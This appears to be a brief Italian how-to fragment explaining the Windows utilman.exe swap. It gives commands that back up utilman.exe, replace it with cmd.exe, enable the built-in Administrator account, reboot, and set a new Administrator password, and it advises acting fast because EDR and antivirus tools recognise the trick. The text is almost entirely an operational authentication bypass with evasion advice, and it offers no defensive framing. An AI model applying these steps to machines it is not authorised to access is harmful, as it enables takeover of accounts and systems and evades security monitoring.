E' un trucco noto anche agli EDR e antivirus, una volta scambiato il file bisogna agire velocemente.
net user Administrator NuovaPass1
Eseguire questi comandi, se il comando net
ritorna un errore, l'utente Administrator potrebbe essere stato rinominato. Per avere l'elenco degli utenti locali dare il comando net user
c: cd \Windows\System32 move utilman.exe utilman.exe.bak copy cmd.exe utilman.exe net user administrator /active:yes shutdown -r -t 0